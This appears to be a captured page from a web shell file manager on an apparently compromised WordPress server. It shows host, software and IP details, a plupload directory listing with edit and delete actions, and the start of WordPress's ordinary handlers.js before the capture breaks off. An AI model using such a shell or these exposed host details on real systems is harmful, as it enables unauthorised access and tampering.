NG4R3P
Linux backups 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
  SOFT : Apache/2.4.18 (Ubuntu) PHP : 7.2.34-8+ubuntu16.04.1+deb.sury.org+1
/var/www/itaipava/wp-includes/js/plupload/
138.68.56.76

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
handlers.js 16.576 KB -rw-r--r-- 2017-05-16 11:58 R E G D
handlers.min.js 10.989 KB -rwxr-xr-x 2021-04-15 00:18 R E G D
license.txt 17.565 KB -rw-r--r-- 2011-07-29 02:59 R E G D
moxie.js 248.896 KB -rw-r--r-- 2017-09-22 14:10 R E G D
moxie.min.js 86.4 KB -rwxr-xr-x 2021-04-15 00:18 R E G D
plupload.js 59.667 KB -rw-r--r-- 2017-09-01 06:28 R E G D
plupload.min.js 16.013 KB -rwxr-xr-x 2021-04-15 00:18 R E G D
wp-plupload.js 13.194 KB -rw-r--r-- 2017-09-08 12:42 R E G D
wp-plupload.min.js 5.555 KB -rwxr-xr-x 2021-04-15 00:18 R E G D
REQUEST EXIT
/* global plupload, pluploadL10n, ajaxurl, post_id, wpUploaderInit, deleteUserSetting, setUserSetting, getUserSetting, shortform */ var topWin = window.dialogArguments || opener || parent || top, uploader, uploader_init; // progress and success handlers for media multi uploads function fileQueued(fileObj) { // Get rid of unused form jQuery('.media-blank').remove(); var items = jQuery('#media-items').children(), postid = post_id || 0; // Collapse a single item if ( items.length == 1 ) { items.removeClass('open').find('.slidetoggle').slideUp(200); } // Create a progress bar containing the filename jQuery('
') .attr( 'id', 'media-item-' + fileObj.id ) .addClass('child-of-' + postid) .append('
0%
', jQuery('
').text( ' ' + fileObj.name )) .appendTo( jQuery('#media-items' ) ); // Disable submit jQuery('#insert-gallery').prop('disabled', true); } function uploadStart() { try { if ( typeof topWin.tb_remove != 'undefined' ) topWin.jQuery('#TB_overlay').unbind('click', topWin.tb_remove); } catch(e){} return true; } function uploadProgress(up, file) { var item = jQuery('#media-item-' + file.id); jQuery('.bar', item).width( (200 * file.loaded) / file.size ); jQuery('.percent', item).html( file.percent + '%' ); } // check to see if a large file failed to upload function fileUploading( up, file ) { var hundredmb = 100 * 1024 * 1024, max = parseInt( up.settings.max_file_size, 10 ); if ( max > hundredmb && file.size > hundredmb ) { setTimeout( function() { if ( file.